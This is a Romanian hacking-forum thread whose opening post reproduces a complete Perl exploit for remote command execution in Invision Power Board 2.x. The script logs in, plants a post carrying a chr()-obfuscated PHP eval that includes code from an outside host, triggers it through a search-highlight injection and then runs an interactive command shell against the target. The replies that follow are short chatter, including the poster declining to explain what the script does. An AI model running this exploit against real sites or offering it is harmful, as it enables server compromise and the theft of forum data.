Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
Cezi pe Simpatie
 | Femeie
23 ani
Vaslui
cauta Barbat
27 - 80 ani |
|
|
dasda
-
Inregistrat: acum 17 ani
Postari: 265
|
|
Code:
#!/usr/bin/perl
## Invision Power Board 2.* commands execution exploit by [b]undeva[/b]/GHC
## vulnerable versions <= 2.1.5
## tested on 2.1.4, 2.0.2
##
## (c)oded by 1dt.w0lf
## [b]undeva[/b]/GHC
## http://[b]undeva[/b].void.ru
## http://ghc.ru
use IO::Socket;
use Getopt::Std;
getopts("l:h:d:f:v:");
$host = $opt_h;
$dir = $opt_d;
$login = $opt_l;
$password = $opt_p;
$forum = $opt_f;
$version = $opt_v || 0;
$|++;
header();
if(!$host||!$dir||!$login||!$password||!$forum) { usage(); }
print "[~] SERVER : $hostrn";
print "[~] PATH : $dirrn";
print "[~] LOGIN : $loginrn";
print "[~] PASSWORD : $passwordrn";
print "[~] TARGET : $version";
print (($version)?(' - IPB 2.1.*')' - IPB 2.0.*'));
print "rn";
print "[~] Login ... ";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
$login =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$post = 'UserName='.$login.'&PassWord='.$password;
$loggedin = 0;
print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1rn";
print $sock "Host: $hostrn";
print $sock "Connection: closern";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Content-length: ".length($post)."rnrn";
print $sock "$post";
print $sock "rnrn";
while (<$sock>)
{
if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }
}
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
print $sock "GET ${dir}index.php HTTP/1.1rn";
print $sock "Host: $hostrn";
print $sock "Cookie: session_id=$sid;rn";
print $sock "Connection: closernrn";
while (<$sock>)
{
if(/act=Login&CODE=03/) { $loggedin = 1; last; }
}
if($loggedin) { print " [ DONE ]rn"; }
else { print " [ FAILED ]rn"; exit(); }
print "[+] SID: $sidrn";
print "[~] Try get md5_check ...";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
if($version==1)
{
print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1rn";
}
else
{
print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1rn";
}
print $sock "Host: $hostrn";
print $sock "Cookie: session_id=$sid;rn";
print $sock "Connection: closernrn";
while (<$sock>)
{
if($version == 1 && /ipb_md5_checks*= "([a-f|0-9]{32})"/) { $md5_check = $1; last; }
if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }
}
close($sock);
if($md5_check) { print " [ DONE ]rn"; print "[+] MD5_CHECK : $md5_checkrn"; }
else { print " [ FAILED ]rn"; exit(); }
print "[~] Create new message ...";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
$created = 0;
$text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr (116).chr(112).chr(58).chr(47).chr(47).chr(114).ch r(115).chr(116).chr(46).chr(118).chr(111).chr(105) .chr(100).chr(46).chr(114).chr(117).chr(47).chr(11 4).chr(53)'.
'.chr(55).chr(105).chr(112).chr(98).chr(105).chr(1 10).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
$post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check} &removeattachid=0&CODE=01&post_key=&TopicTitle=jus txpl&TopicDesc=justxpl&poll_question=&ffont=0&fsiz e=0&Post=${text}&enableemo=yes&enablesig=yes&iconi d=0";
print $sock "POST ${dir}index.php HTTP/1.1rn";
print $sock "Host: $hostrn";
print $sock "Cookie: session_id=$sid;rn";
print $sock "Connection: closern";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Content-length: ".length($post)."rnrn";
print $sock "$post";
print $sock "rnrn";
while (<$sock>)
{
if(/Location:/) { $created = 1; last; }
}
if($created) { print " [ DONE ]rn"; }
else { print " [ FAILED ]rn"; exit(); }
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[~] Search message ...";
$post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login. '&forums%5B%5D=all&searchsubs=1&prune=0&prune_type =newer&sort_key=last_post&sort_order=desc&search_i n=posts&result_type=posts';
print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1rn";
print $sock "Host: $hostrn";
print $sock "Cookie: session_id=$sid;rn";
print $sock "Connection: closern";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Content-length: ".length($post)."rnrn";
print $sock "$post";
print $sock "rnrn";
while (<$sock>)
{
if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }
}
if($searchid) { print " [ DONE ]rn"; }
else { print "[ FAILED ]rn"; exit(); }
print "[+] SEARCHID: $searchidrn";
$get = 'index.php?act=Search&CODE=show&searchid='.$search id.'&search_in=posts&result_type=posts&highlite=r5 7ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00';
while ()
{
print "Command for execute or 'exit' for exit # ";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
exit() if ($cmd eq 'exit');
last;
}
&run($cmd);
}
sub run()
{
$cmd =~ s/(.*);$/$1/eg;
$cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20' ;
$cmd2 .= $cmd;
$cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F';
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1rn";
print $sock "Host: $hostrn";
print $sock "Cookie: session_id=$sid;rn";
print $sock "Connection: closernrn";
$on = 0;
$runned = 0;
while ($answer = <$sock>)
{
if ($answer =~ /^_END_/) { return 0; }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}
}
sub header()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~rn";
print " Invision Power Board 2.* commands execution exploit by [b]undeva[/b]/GHCrn";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~rn";
}
sub usage()
{
print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>rnrn";
print "<host> - host where IPB installed e.g www.ipb.comrn";
print "<dir> - folder where IPB installed e.g. /forum/ , /ipb/ , etc...rn";
print "<login> - login of any exist userrn";
print "<password> - and password too )rn";
print "<forum> - number of forum where user can create topic e.g 2,4, etcrn";
print "<version> - forum version:rn";
print " 0 - 2.0.*rn";
print " 1 - 2.1.*rn";
exit();
} |
_______________________________________
Imperfect ? Where ? ...
|
|
| pus acum 17 ani |
|
|
Y2K`
Elite Member
Din: 666
Inregistrat: acum 17 ani
Postari: 970
|
|
sc ca te deranjez da ce face programu ? zici ca ii putty :|
|
|
| pus acum 17 ani |
|
|
dasda
-
Inregistrat: acum 17 ani
Postari: 265
|
|
Daca iti dam toti mura-n gura tu cum mai inveti fratele meu :O ? Chiar nu iti dai seama daca scrie in titplu Invasion Power Board? /
_______________________________________
Imperfect ? Where ? ...
|
|
| pus acum 17 ani |
|
|
Y2K`
Elite Member
Din: 666
Inregistrat: acum 17 ani
Postari: 970
|
|
nu am azuzit mah de aja ceva :|
|
|
| pus acum 17 ani |
|
|
dasda
-
Inregistrat: acum 17 ani
Postari: 265
|
|
uite un forum de ipb acuma sti ce este ala un ipb :P
_______________________________________
Imperfect ? Where ? ...
|
|
| pus acum 17 ani |
|
|
Y2K`
Elite Member
Din: 666
Inregistrat: acum 17 ani
Postari: 970
|
|
multzam 
Modificat de Y2K` (acum 17 ani)
|
|
| pus acum 17 ani |
|
|
dasda
-
Inregistrat: acum 17 ani
Postari: 265
|
|
npc , incerc sa ajut , incerc sa fiu ajutat :-p , corect? 
_______________________________________
Imperfect ? Where ? ...
|
|
| pus acum 17 ani |
|